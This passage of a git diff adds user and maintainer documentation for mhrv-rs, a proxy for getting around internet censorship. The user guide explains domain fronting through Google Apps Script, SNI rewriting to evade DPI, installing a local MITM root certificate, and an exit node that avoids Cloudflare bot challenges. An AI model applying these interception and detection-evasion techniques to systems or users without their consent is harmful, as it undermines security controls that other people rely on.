+++ b/docs/guide.md
@@ -0,0 +1,418 @@
+# mhrv-rs — Full guide
+
+This is the long version — every config option, every advanced mode, every troubleshooting tip. For the 5-minute quick start, see the [main README](../README.md).
+
+[Persian version (راهنمای فارسی)](guide.fa.md)
+
+## Contents
+
+- [How it works in detail](#how-it-works-in-detail)
+- [Platforms and binaries](#platforms-and-binaries)
+- [Where files live on disk](#where-files-live-on-disk)
+- [Apps Script deployment](#apps-script-deployment)
+  - [Cloudflare Worker variant (faster)](#cloudflare-worker-variant)
+  - [Direct mode (when ISP blocks `script.google.com`)](#direct-mode)
+- [CLI reference](#cli-reference)
+  - [scan-ips API mode](#scan-ips-api-mode)
+- [Telegram via xray](#telegram-via-xray)
+- [Full Tunnel mode](#full-tunnel-mode)
+  - [How deployment IDs affect performance](#how-deployment-ids-affect-performance)
+  - [Quick start](#full-mode-quick-start)
+- [Exit node — for ChatGPT / Claude / Grok](#exit-node)
+- [Sharing via hotspot](#sharing-via-hotspot)
+- [Running on OpenWRT or any musl distro](#running-on-openwrt)
+- [Diagnostics](#diagnostics)
+  - [SNI pool editor](#sni-pool-editor)
+- [What's implemented and what isn't](#whats-implemented-and-what-isnt)
+- [Known limitations](#known-limitations)
+- [Security posture](#security-posture)
+- [FAQ](#faq)
+
+## How it works in detail
+
+```
+Browser / Telegram / xray
+        |
+        | HTTP proxy (8085)  or  SOCKS5 (8086)
+        v
+mhrv-rs (local)
+        |
+        | TLS to Google IP, SNI = www.google.com
+        v                       ^
+   DPI sees www.google.com      |
+        |                       | Host: script.google.com (inside TLS)
+        v                       |
+  Google edge frontend ---------+
+        |
+        v
+  Apps Script relay (your free Google account)
+        |
+        v
+  Real destination
+```
+
+The censor's DPI inspects the TLS SNI and lets `www.google.com` through. Google's edge serves both `www.google.com` and `script.google.com` from the same IP and routes by the HTTP `Host` header inside the encrypted stream.
+
+For Google-owned domains (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) the same tunnel is used directly — no Apps Script relay. This bypasses the per-fetch quota and avoids the locked-in `Google-Apps-Script` User-Agent for those sites. Add more domains via the `hosts` map in `config.json`.
+
+## Platforms and binaries
+
+Linux (x86_64, aarch64), macOS (x86_64, aarch64), Windows (x86_64), **Android 7.0+** (universal APK covering arm64, armv7, x86_64, x86). Prebuilt binaries on the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
+
+**Android:** download `mhrv-rs-android-universal-v*.apk`. Full walk-through in [docs/android.md](android.md) (English) or [docs/android.fa.md](android.fa.md) (Persian). The Android build runs the same `mhrv-rs` Rust crate as desktop (via JNI) plus a TUN bridge via `tun2proxy` so every app on the device routes its IP traffic through the proxy without per-app config.
+
+> **Important Android caveat (issues [#74](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/74) / [#81](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/81)):** TUN captures all IP traffic, but HTTPS from third-party apps only works for apps that trust user-installed CAs. From Android 7+ apps must opt in via `networkSecurityConfig`. **Chrome and Firefox do**; **Telegram, WhatsApp, Instagram, YouTube, banking apps, games** do not. For those: use `PROXY_ONLY` mode and point in-app proxy at `127.0.0.1:1081` (SOCKS5), or use `google_only` mode (no CA, Google services only), or set `upstream_socks5` to an external VPS. This is an Android security design, not a bug.
+
+### What's in a release
+
+Each archive contains:
+
+| file | purpose |
+|---|---|
+| `mhrv-rs` / `mhrv-rs.exe` | CLI. Headless use, servers, automation. No system deps on macOS / Windows. |
+| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | Desktop UI (egui). Config form, Start / Stop / Test buttons, live stats, log panel. |
+| `run.sh` / `run.command` / `run.bat` | Platform launcher: installs the MITM CA (needs sudo / admin) then starts the UI. Use this on first run. |
+
+macOS archives also ship `mhrv-rs.app` (in `*-app.zip`) — double-click in Finder. Run `mhrv-rs --install-cert` or `run.command` once first to install the CA.
+
+<p align="center"><img src="ui-screenshot.png" alt="mhrv-rs desktop UI showing config form, live traffic stats, Start/Stop/Test buttons, and log panel" width="420"></p>
+
+Linux UI also needs `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. On most desktop distros these are already there; on a headless box install them via your package manager, or just use the CLI.
+
+## Where files live on disk
+
+Config and the MITM CA live in the OS user-data dir:
+
+- macOS: `~/Library/Application Support/mhrv-rs/`
+- Linux: `~/.config/mhrv-rs/`
+- Windows: `%APPDATA%\mhrv-rs\`
+
+Inside that dir:
+
+- `config.json` — your settings (written by the UI's **Save** button or hand-edited)
+- `ca/ca.crt`, `ca/ca.key` — the MITM root certificate. Only you have the private key.
+
+The CLI also falls back to `./config.json` in the current working directory for backward compatibility.
+
+## Apps Script deployment
+
+The 5-minute version is in the [main README](../README.md#step-1--make-the-google-apps-script-one-time). This section covers the variants.
+
+### Cloudflare Worker variant
+
+A variant in [`assets/apps_script/Code.cfw.gs`](../assets/apps_script/Code.cfw.gs) + [`assets/cloudflare/worker.js`](../assets/cloudflare/worker.js) turns Apps Script into a thin forwarder and offloads the actual `fetch` to a Cloudflare Worker you deploy. **Day-one win:** latency (~10–50 ms at the CF edge vs ~250–500 ms in Apps Script — visibly snappier for browsing and Telegram).
+
+It does **not** reduce your daily 20k Apps Script `UrlFetchApp` count, because today's mhrv-rs always sends single-URL relay requests; the batch path on the GAS+Worker side is wired and ready (`ceil(N/40)` quota per N-URL batch) but no shipping client emits it.
+
+**Trade-offs:**
+- Worse for YouTube long-form (30 s wall clock vs 6 min Apps Script)
+- Doesn't fix Cloudflare anti-bot
+- **Not compatible with `mode: "full"`** (no tunnel-ops support → won't help WhatsApp / messengers on Android Full mode)
+
+Full setup and trade-off table in [`assets/cloudflare/README.md`](../assets/cloudflare/README.md). mhrv-rs needs no config changes — same `mode: "apps_script"`, same `script_id`, same `auth_key`.
+
+### Direct mode
+
+If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1 to succeed *before* you have a relay. mhrv-rs ships a `direct` mode for exactly this — SNI-rewrite tunnel only, no Apps Script relay required. (Was named `google_only` before v1.9 — old name still accepted.)
+
+1. Download the binary (see [main README → Step 2](../README.md#step-2--download-mhrv-rs))
+2. Copy [`config.direct.example.json`](../config.direct.example.json) to `config.json` — no `script_id`, no `auth_key` required
+3. Run `mhrv-rs serve` and set browser HTTP proxy to `127.0.0.1:8085`
+4. In `direct` mode, the proxy only routes `*.google.com`, `*.youtube.com`, and other Google-edge hosts (plus any [`fronting_groups`](fronting-groups.md) you've configured) via the SNI-rewrite tunnel. Other traffic goes raw — no Apps Script relay exists yet.
+5. Now do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy `Code.gs`, copy the Deployment ID.
+6. In the UI / Android app / by editing `config.json`, switch mode to `apps_script`, paste the Deployment ID and your auth key, and restart.
+
+Verify reachability before even starting the proxy: `mhrv-rs test-sni` probes `*.google.com` directly and works without any config beyond `google_ip` + `front_domain`.
+
+## CLI reference
+
+Everything the UI does is also in the CLI. Copy `config.example.json` to `config.json` (next to the binary, or in the user-data dir):
+
+```json
+{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
+  "auth_key": "same-secret-as-in-code-gs",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true
+}
+```
+
+Then:
+
+```bash
+./mhrv-rs                   # serve (default)
+./mhrv-rs test              # one-shot end-to-end probe
+./mhrv-rs scan-ips          # rank Google frontend IPs by latency
+./mhrv-rs test-sni          # probe SNI names against your google_ip
+./mhrv-rs --install-cert    # reinstall the MITM CA
+./mhrv-rs --remove-cert     # uninstall + delete the whole ca/ dir
+./mhrv-rs --help
+```
+
+`--remove-cert` deletes the CA from the OS trust store, deletes the on-disk `ca/` directory, and verifies the revocation by name. NSS cleanup (Firefox, Chrome on Linux) is best-effort: if `certutil` isn't on PATH or a browser holds the NSS DB open, the tool logs a manual-cleanup hint. Your `config.json` and the Apps Script deployment are untouched, so a fresh CA does not require redeploying `Code.gs`.
+
+> **Upgrading from pre-v1.2.11?** Earlier versions wrote a bare `user_pref("security.enterprise_roots.enabled", true);` into each Firefox profile's `user.js` without a marker. `--remove-cert` does not strip that line — it's indistinguishable from one a user or corp policy wrote. Firefox falls back to its built-in Mozilla root store the moment the MITM CA leaves the OS trust store, so this has no functional effect. Delete by hand if it bothers you.
+
+`script_id` can also be a JSON array: `["id1", "id2", "id3"]`.
+
+### scan-ips API mode
+
+By default, `scan-ips` uses a static list. Enable dynamic IP discovery in `config.json`:
+
+```json
+{
+  "fetch_ips_from_api": true,
+  "max_ips_to_scan": 100,
+  "scan_batch_size": 100,
+  "google_ip_validation": true
+}
+```
+
+When enabled:
+- Fetches `goog.json` from Google's public IP ranges API
+- Extracts CIDRs and expands them to individual IPs
+- Prioritizes IPs from famous Google domains (google.com, youtube.com, etc.)
+- Randomly selects up to `max_ips_to_scan` candidates (prioritized first)
+- Tests only those candidates for connectivity and frontend validation
+
+You may find IPs that are faster than those in the static list, but there is no guarantee that all of them work.
+
+## Telegram via xray
+
+The Apps Script relay only speaks HTTP request / response, so non-HTTP protocols (Telegram MTProto, IMAP, SSH, raw TCP) can't travel through it. Without anything else, those flows hit the direct-TCP fallback — which means they're not actually tunneled, and an ISP that blocks Telegram still blocks them.
+
+**Fix:** run a local [xray](https://github.com/XTLS/Xray-core) (or v2ray / sing-box) with a VLESS / Trojan / Shadowsocks outbound to your own VPS, and point mhrv-rs at xray's SOCKS5 inbound via the **Upstream SOCKS5** field (or the `upstream_socks5` config key). When set, raw-TCP flows through mhrv-rs's SOCKS5 listener get chained into xray → the real tunnel.
+
+```
+Telegram  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
+          ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ SNI rewrite ──────── google.com, youtube.com, …
+Browser   ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── your VPS   (Telegram, IMAP, SSH, raw TCP)
+```
+
+Config fragment:
+
+```json
+{
+  "upstream_socks5": "127.0.0.1:50529"
+}
+```
+
+HTTP / HTTPS keeps going through Apps Script (no change), and the SNI-rewrite tunnel for `google.com` / `youtube.com` keeps bypassing both — YouTube stays as fast as before while Telegram gets a real tunnel.
+
+## Full Tunnel mode
+
+`"mode": "full"` routes **all** traffic end-to-end through Apps Script and a remote [tunnel-node](../tunnel-node/) — no MITM certificate needed. TCP is carried as persistent tunnel sessions; UDP from Android / TUN clients goes via SOCKS5 `UDP ASSOCIATE` to the tunnel-node, which emits real UDP server-side. Trade-off: higher per-request latency (every byte goes Apps Script → tunnel-node → destination), but it works for any protocol and any app, with no CA install required.
+
+### How deployment IDs affect performance
+
+Each Apps Script batch round-trip takes ~2 s. In Full mode, mhrv-rs runs a **pipelined batch multiplexer** that fires multiple batches concurrently without waiting on the previous one. Each Deployment ID (= one Google account) gets its own concurrency pool of **30 in-flight requests** — matching the per-account Apps Script execution limit.
+
+```
+max_concurrent = 30 × number_of_deployment_ids
+```
+
+| Deployments | Concurrent | Notes |
+|---|---|---|
+| 1 | 30 | Single account — fine for light browsing |
+| 3 | 90 | Good for daily use |
+| 6 | 180 | Recommended for heavy use |
+| 12 | 360 | Multi-account power setup |
+
+More deployments = more total concurrency = lower per-session latency. Each batch round-robins across your IDs, spreading load and reducing the chance of hitting any single deployment's quota ceiling.
+
+**Resource guards:**
+- **50 ops max** per batch — if more sessions are active, the mux splits into multiple batches
+- **4 MB payload cap** per batch — well under Apps Script's 50 MB limit
+- **30 s timeout** per batch — slow / dead targets can't block other sessions forever
+
+### Full mode quick start
+
+1. Deploy [`CodeFull.gs`](../assets/apps_script/CodeFull.gs) as a Web App on **each Google account** (same steps as `Code.gs`, but use the full-mode script that forwards to your tunnel-node). One deployment per account — the 30-concurrent limit is per account, so multiple deployments on one account share the pool. To scale, use more accounts:
+   - **Solo use** → 1–2 accounts
+   - **Shared with ~3 people** → 3 accounts
+   - **Shared with a group** → one account per heavy user
+
+2. Deploy [tunnel-node](../tunnel-node/) on a VPS. Fastest is the prebuilt Docker image:
+   ```bash
+   docker run -d --name mhrv-tunnel --restart unless-stopped \
+     -p 8080:8080 -e TUNNEL_AUTH_KEY=your-strong-secret \
+     ghcr.io/therealaleph/mhrv-tunnel-node:latest
+   ```
+   Multi-arch (linux/amd64 + linux/arm64), runs as non-root, ~32 MB compressed. Pin a version tag (`:1.5.0`) for production. See [tunnel-node/README.md](../tunnel-node/README.md) for Cloud Run, docker-compose, and source-build alternatives.
+
+3. Set `"mode": "full"` in your config with all deployment IDs:
+   ```json
+   {
+     "mode": "full",
+     "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
+     "auth_key": "your-secret"
+   }
+   ```
+
+## Exit node
+
+Cloudflare-fronted services (chatgpt.com, claude.ai, grok.com, x.com, openai.com) flag traffic from Google datacenter IPs as bots and serve a Turnstile / CAPTCHA challenge. The exit node fix is a small TypeScript HTTP handler you deploy on a serverless host (Deno Deploy, fly.io, or your own VPS) that sits between Apps Script and the destination:
+
+```
+client → Apps Script (Google IP) → your exit node (non-Google IP) → CF-protected site
+```
+
+The destination sees the exit node's IP, not Google's, so the anti-bot heuristic doesn't fire.
+
+**Setup:** [`assets/exit_node/README.md`](../assets/exit_node/README.md). 5 min, free tier.
+
+## Sharing via hotspot
+
+mhrv-rs listens on `0.0.0.0` by default, so any device on the same network can use it. Common scenario: share the tunnel from an Android phone to an iPhone, iPad, or laptop over hotspot:
+
+1. **Android:** enable mobile hotspot + start the app
+2. **Other device:** connect to the Android hotspot Wi-Fi
+3. **Configure proxy** on the other device:
+   - Server: `192.168.43.1` (Android's default hotspot IP)
+   - Port: `8080` (HTTP) or `1081` (SOCKS5)
+
+### iOS
+
+Settings → Wi-Fi → tap (i) on the hotspot network → Configure Proxy → Manual → Server `192.168.43.1`, Port `8080`.
+
+For full device-wide coverage on iOS, use [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) or [Potatso](https://apps.apple.com/app/potatso/id1239860606) — point at SOCKS5 (`192.168.43.1:1081`) and it routes all traffic through the tunnel.
+
+### macOS / Windows
+
+Set system HTTP proxy to `192.168.43.1:8080`, or per-app SOCKS5 to `192.168.43.1:1081`.
+
+> If `listen_host` is `127.0.0.1` in your config, change to `0.0.0.0` to allow other devices.
+
+## Running on OpenWRT
+
+The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any other Linux regardless of which libc the system provides. Put the binary on the router and start it as a service:
+
+```sh
+# From a machine that can reach your router:
+scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
+scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
+scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+
+# On the router:
+chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
+/etc/init.d/mhrv-rs enable
+/etc/init.d/mhrv-rs start
+logread -e mhrv-rs -f       # tail logs
+```
+
+LAN devices then point HTTP proxy at the router's LAN IP (default port `8085`) or SOCKS5 at `<router-ip>:8086`. Set `listen_host` to `0.0.0.0` in `/etc/mhrv-rs/config.json` so the router accepts LAN connections.
+
+Memory footprint ~15–20 MB resident — fine on anything ≥128 MB RAM. No UI on musl (routers are headless).
+
+## Diagnostics
+
+- **`mhrv-rs test`** — sends one request through the relay, reports success / latency. First thing to try when something breaks — separates "relay is up" from "client config is wrong".
+- **`mhrv-rs scan-ips`** — parallel TLS probe of 28 known Google frontend IPs, sorted by latency. Take the winner and put it in `google_ip`. The UI offers the same thing behind the **scan** button.
+- **`mhrv-rs test-sni`** — parallel TLS probe of every SNI name in your rotation pool against `google_ip`. Tells you which front-domain names pass through your ISP's DPI. The UI offers the same thing in the **SNI pool…** window, with checkboxes, per-row **Test** buttons, and **Keep ✓ only** to auto-trim.
+- **Periodic stats** logged every 60 s at `info` level (relay calls, cache hit rate, bytes relayed, active vs blacklisted scripts). UI shows live.
+
+### SNI pool editor
+
+By default, mhrv-rs rotates through `{www, mail, drive, docs, calendar}.google.com` on outbound TLS to your `google_ip`, to avoid fingerprinting one name too heavily. Some may be locally blocked (e.g. `mail.google.com` has been targeted in Iran at various times).
+
+Either:
+
+- UI → **SNI pool…** → **Test all** → **Keep ✓ only** to auto-trim. Add custom names via the text field at the bottom. Save.
+- Or edit `config.json`:
+
+```json
+{
+  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
+}
+```
+
+Leaving `sni_hosts` unset gives you the default auto-pool. Run `mhrv-rs test-sni` to verify what works from your network.
+
+## What's implemented and what isn't
+
+This port focuses on the **`apps_script` mode** — the only one that reliably works against a modern censor in 2026. Implemented:
+
+- [x] Local HTTP proxy (CONNECT for HTTPS, plain forwarding for HTTP)
+- [x] Local SOCKS5 with smart TLS / HTTP / raw-TCP dispatch (Telegram, xray, etc.)
+- [x] MITM with on-the-fly per-domain certs via `rcgen`
+- [x] CA generation + auto-install on macOS / Linux / Windows
+- [x] Firefox NSS cert install (best-effort via `certutil`)
+- [x] Apps Script JSON relay protocol-compatible with `Code.gs`
+- [x] Connection pooling (45 s TTL, max 20 idle)
+- [x] Gzip response decoding
+- [x] Multi-script round-robin
+- [x] Auto-blacklist failing scripts on 429 / quota errors (10 min cooldown)
+- [x] Response cache (50 MB, FIFO + TTL, `Cache-Control: max-age` aware, heuristics for static assets)
+- [x] Request coalescing: concurrent identical GETs share one upstream fetch
+- [x] SNI-rewrite tunnels for `google.com`, `youtube.com`, `youtu.be`, `youtube-nocookie.com`, `fonts.googleapis.com`, configurable via `hosts` map
+- [x] Automatic redirect handling on the relay (`/exec` → `googleusercontent.com`)
+- [x] Header filtering (strip connection-specific, brotli)
+- [x] `test` and `scan-ips` subcommands
+- [x] Script IDs masked in logs (`prefix…suffix`) so logs don't leak deployment IDs
+- [x] Desktop UI (egui) — cross-platform, no bundler needed
+- [x] Optional upstream SOCKS5 chaining for non-HTTP traffic (Telegram MTProto, IMAP, SSH…)
+- [x] Connection pool pre-warm on startup
+- [x] Per-connection SNI rotation across `{www, mail, drive, docs, calendar}.google.com`
+- [x] Optional parallel script-ID dispatch (`parallel_relay`): fan-out to N script instances, return first success
+- [x] Per-site stats drill-down in the UI (requests, cache hit %, bytes, avg latency per host)
+- [x] Editable SNI rotation pool (UI window + `sni_hosts` config field) with reachability probes
+- [x] OpenWRT / Alpine / musl builds — static binaries, procd init script included
+- [x] **Exit node** support for Cloudflare-fronted sites (v1.9.4+)
+- [x] **Goog.script.init iframe unwrap** — defense-in-depth against deployments that return HtmlService-wrapped responses (v1.9.6+)
+
+Intentionally **not** implemented:
+
+- **HTTP/2 multiplexing** — `h2` crate state machine has too many subtle hang cases; coalescing + 20-conn pool gets most of the benefit
+- **Request batching (`q:[...]` mode in apps_script mode)** — connection pool + tokio async already parallelizes well; batching adds ~200 lines of state for unclear gain
+- **Range-based parallel download** — the edge cases are real (non-Range servers, chunked mid-stream), and YouTube already bypasses Apps Script via the SNI-rewrite tunnel
+- **Other modes** (`domain_fronting`, `google_fronting`, `custom_domain`) — Cloudflare killed generic domain fronting in 2024; Cloud Run needs a paid plan
+
+## Known limitations
+
+These are inherent to the Apps Script + domain-fronting approach, not bugs in this client. The original Python version has the same issues.
+
+- **User-Agent fixed to `Google-Apps-Script`** for traffic through the relay. `UrlFetchApp.fetch()` doesn't allow override. Sites that detect bots (Google search, some CAPTCHAs) serve degraded / no-JS pages. Workaround: add the affected domain to the `hosts` map so it's routed through the SNI-rewrite tunnel with your real browser's UA. `google.com`, `youtube.com`, `fonts.googleapis.com` are already there.
+- **Video playback slow and quota-limited** for anything through the relay. YouTube HTML loads fast (SNI-rewrite tunnel), but `googlevideo.com` chunks go through Apps Script. Free tier: ~20k `UrlFetchApp` calls / day, 50 MB body cap per fetch. Fine for text browsing, painful for 1080p. Rotate multiple `script_id`s for headroom, or use a real VPN for video.
+- **Brotli stripped** from forwarded `Accept-Encoding`. Apps Script can decompress gzip but not `br`; forwarding `br` would garble responses. Minor size overhead.
+- **WebSockets don't work** through the relay — it's request / response JSON. Sites that upgrade to WS fail (ChatGPT streaming, Discord voice, etc.).
+- **HSTS-preloaded / hard-pinned sites** reject the MITM cert. Most sites are fine; a handful aren't.
+- **Google / YouTube 2FA and sensitive logins** may trigger "unrecognized device" warnings because requests originate from Google's Apps Script IPs, not yours. Log in once via the tunnel (`google.com` is in the rewrite list) to avoid this.
+
+## Security posture
+
+- The MITM root **stays on your machine only**. `ca/ca.key` private key is generated locally and never leaves the user-data dir.
+- `auth_key` is a shared secret you pick. Server-side `Code.gs` rejects requests without a matching key.
+- Traffic between your machine and Google's edge is standard TLS 1.3.
+- What Google can see: the destination URL and headers of each request (Apps Script fetches on your behalf). This is the same trust model as any hosted proxy — if that is not acceptable, use a self-hosted VPN instead.
+- **IP exposure caveat (`apps_script` mode):** v1.2.9 strips every `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` header and ~10 related identity-revealing headers from outbound requests before they reach Apps Script ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). What it does **not** cover: whatever Google's own infrastructure may add when its Apps Script runtime makes the subsequent `UrlFetchApp.fetch()` to the target. That second leg is server-side, outside this client's control. The destination sees a Google datacenter IP, but there is no public guarantee that Google never propagates the original caller's IP in some internal header chain. If your threat model requires that the destination cannot under any circumstances learn your IP, **use Full Tunnel mode** (traffic exits from your own VPS, so only the VPS IP is exposed end-to-end). `apps_script` mode is fine for bypassing DPI / reaching blocked sites where "seen by Google" is acceptable. Raised in [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+- v1.9.6+ Code.gs / CodeFull.gs also strip `X-Forwarded-*` / `Forwarded` / `Via` server-side as a second line of defense.
+
+## FAQ
+
+**How many Deployment IDs do I need?** One is fine for normal use. The free `UrlFetchApp` quota is 20,000 fetches / day per account (100,000 for paid Workspace), with a 50 MB body cap per fetch. Use **one deployment per Google account** — the 30-concurrent limit is per account, so multiple deployments on the same account don't add concurrency. To scale, deploy in different Google accounts. Reference: <https://developers.google.com/apps-script/guides/services/quotas>
+
+**Why does Google search show without JavaScript sometimes?** Apps Script is forced to set `User-Agent: Google-Apps-Script`. Some sites detect that and serve no-JS fallback. Domains in the SNI-rewrite list (`google.com`, `youtube.com`, etc.) are immune because they go directly to Google's edge, not through Apps Script.
+
+**Is logging into a Google account through this safe?** Recommended: log in once **without** the proxy, or with a real VPN, the first time. Google may flag the Apps Script IP as an "unknown device" and warn. After the initial login, use is fine.
+
+**How do I remove the certificate later?**
+- **Easiest (any OS):** click **Remove CA** in the UI, or:
+  - macOS / Linux: `sudo ./mhrv-rs --remove-cert`
+  - Windows (run as administrator): `mhrv-rs.exe --remove-cert`
+  - Removes from system trust store, NSS (Firefox / Chrome on Linux), and deletes `ca/ca.crt` + `ca/ca.key` on disk. Your `config.json` and Apps Script deployment are not touched.
+- **Manually:** the cert's Common Name is `MasterHttpRelayVPN` (not `mhrv-rs` — that's the app name).
+  - **macOS:** Keychain Access → System → search `MasterHttpRelayVPN` → delete. Then `rm -rf ~/Library/Application\ Support/mhrv-rs/ca/`
+  - **Windows:** `certmgr.msc` → Trusted Root Certification Authorities → search `MasterHttpRelayVPN` → delete
+  - **Linux:** delete `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` then `sudo update-ca-certificates`
+
+**`GLIBC_2.39 not found` error on Linux?** Use `mhrv-rs-linux-musl-amd64.tar.gz` — it is fully static and runs on any Linux without depending on the system `glibc`.
+
+## License
+
+MIT. See [LICENSE](../LICENSE).
diff --git a/docs/maintainer/README.md b/docs/maintainer/README.md
new file mode 100644
index 00000000..5639af45
--- /dev/null
+++ b/docs/maintainer/README.md
@@ -0,0 +1,18 @@
+# Maintainer knowledge base
+
+Project-internal knowledge base for triaging issues, reviewing PRs, cutting releases, and writing user-facing replies in the project's voice. Treat this as canonical context for any maintenance work — local or automated.
+
+## Read order
+
+Start with `SKILL.md` for orientation, conventions, and pointers. Then read references lazily as relevant to the current task:
+
+- `references/architecture.md` — apps_script vs Full mode, MITM CA, tunnel-node, AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE, SNI rewriting, Apps Script's hidden constraints
+- `references/issue-patterns.md` — recurring user issue patterns with diagnostic procedures and canonical reply structures
+- `references/diagnostic-taxonomy.md` — six candidate causes for the placeholder body, DIAGNOSTIC_MODE disambiguator
+- `references/workflow-conventions.md` — reply marker, Persian/English match rule, changelog format, commit messages, close reasons
+- `references/release-workflow.md` — Cargo.toml → tag → Telegram pipeline
+- `references/contributors.md` — core contributor roles + their substantive PRs
+- `references/roadmap.md` — current and upcoming release batches
+- `references/persian-templates.md` — adaptable Persian reply templates and standardized phrasings
+- `assets/changelog-template.md` — starter template for a new `docs/changelog/vX.Y.Z.md`
+- `assets/reply-marker.md` — the standard reply footer
diff --git a/docs/maintainer/SKILL.md b/docs/maintainer/SKILL.md
new file mode 100644
index 00000000..e24568b6
--- /dev/null
+++ b/docs/maintainer/SKILL.md
@@ -0,0 +1,114 @@
+# mhrv-rs maintenance
+
+This document encodes the project context, recurring patterns, and conventions needed to ship code, triage issues, and respond to users effectively. It is the entry point to the broader knowledge base in `references/`.
+
+## Why this matters
+
+mhrv-rs is **infrastructure for circumvention**. The bulk of the userbase is in Iran — under one of the world's heaviest internet censorship regimes — using this tool to reach YouTube, Wikipedia, Telegram, GitHub, news sites, banking, and (critically) to communicate with family abroad. A non-trivial fraction of users are in Russia, China, Belarus, and other censored networks, but Iran dominates the issue tracker.
+
+The project's value comes from the architecture itself: because traffic is routed through Google Apps Script, the user's ISP only sees encrypted HTTPS to Google IPs (`216.239.38.120` etc.) — the exact same fingerprint as `www.google.com`. ISPs that block conventional VPNs are forced to either let mhrv-rs through or break Google access for the entire country. This asymmetry is what makes the project work, and it shapes every architectural decision.
+
+When responding to a Persian-language issue, the responder is often the only English-speaking maintainer the reporter has access to. Be clear, generous, and specific. When shipping a release, you're shipping it to people for whom the alternative is not "use a different tool" but "lose internet access". This drives the project's bias toward shipping over polish, toward backwards-compatible defaults, and toward documenting workarounds even when the proper fix is months away.
+
+## Working directory and conventions
+
+This is a standard Rust project. `cd` into your local clone before running git/gh/cargo commands, or use absolute paths. Reply markdown files for `gh issue comment --body-file` are conventionally written to a temporary file (e.g., `/tmp/...`) before posting, to avoid HEREDOC quoting issues with backticks and `$()` substitutions.
+
+## Reference files (read as needed)
+
+This knowledge base is structured for progressive disclosure. The body below covers conventions and reflexes; the reference files have the deep context for specific tasks. Read them lazily — only the ones relevant to what you're doing.
+
+- **`references/architecture.md`** — Read when explaining the system to a user, debugging unfamiliar log patterns, or making an architectural decision. Covers domain fronting, apps_script vs Full mode, MITM CA, tunnel-node, the AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE distinction, SNI rewriting, and `google_ip` rotation.
+- **`references/issue-patterns.md`** — Read when triaging a new issue. Catalogs the most common user-reported issue patterns with diagnostic procedures and canonical reply structures.
+- **`references/diagnostic-taxonomy.md`** — Read when a user shows a failure log with `no json in batch response` or HTML body. The six candidate causes for the placeholder body, what each looks like, and how `DIAGNOSTIC_MODE=true` disambiguates them.
+- **`references/workflow-conventions.md`** — Read when writing a reply, changelog, or commit message. Reply marker, Persian-vs-English language convention, changelog format, semver discipline.
+- **`references/release-workflow.md`** — Read when cutting a release. Cargo.toml bump → changelog → commit → tag → push, then auto-fired CI handles the rest (release builds + Telegram channel publishing).
+- **`references/contributors.md`** — Read when interacting with named contributors. Each top contributor has a domain they specialize in.
+- **`references/roadmap.md`** — Read when categorizing a feature request. Current and upcoming release batches.
+- **`references/persian-templates.md`** — Read when writing a Persian reply. Common phrases and full-paragraph templates for the most-repeated Persian-language situations.
+- **`assets/changelog-template.md`** — Use as the starting template when creating a new `docs/changelog/vX.Y.Z.md` file.
+- **`assets/reply-marker.md`** — The exact reply footer to append to every issue/PR comment.
+
+## Conventions to internalize
+
+These show up so frequently they should be memorized rather than looked up each time.
+
+### The reply marker
+
+Every substantive issue or PR comment ends with this exact footer (with a literal `---` HR before it):
+
+```
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+This is non-negotiable. Users in this community recognize the marker. It signals that the reply was drafted by Claude and reviewed by the maintainer before posting. Don't omit it, don't paraphrase it, don't translate "reviewed by" into Persian.
+
+### Persian or English: match the user
+
+If the user wrote in Persian, reply in Persian. If they wrote in English, reply in English. If they mixed (common), match the dominant language. Never assume Iranian users want English — many are more comfortable in Persian and the message lands better in their language.
+
+Code blocks, command examples, technical terms (`AUTH_KEY`, `script_id`, `parallel_concurrency`), URLs, and the reply marker always stay in their original Latin form. Don't translate them.
+
+### Public artifact tone
+
+Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Persian or English, adjust to the user. Iranian users especially read carefully, and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient.
+
+### Semver discipline
+
+The project uses `vX.Y.Z` strictly:
+- **X (major)** — currently `1`. Bump only on a true ABI/protocol break with the Apps Script side.
+- **Y (minor)** — feature batch. Bump when shipping a coherent set of features (e.g. v1.7 → v1.8).
+- **Z (patch)** — small fix or single-feature addition that doesn't justify a minor bump. Most releases are patch bumps.
+
+Patch releases (v1.8.1, v1.8.2, v1.8.3) ship continuously — every time something user-visible lands. Don't sit on completed work; releases are cheap and Iranian users who ask "when's the fix shipping?" deserve "in the next 30 minutes" not "next week". The release CI is fast (~30 min from tag push to Telegram publish).
+
+### Persian-then-English changelog
+
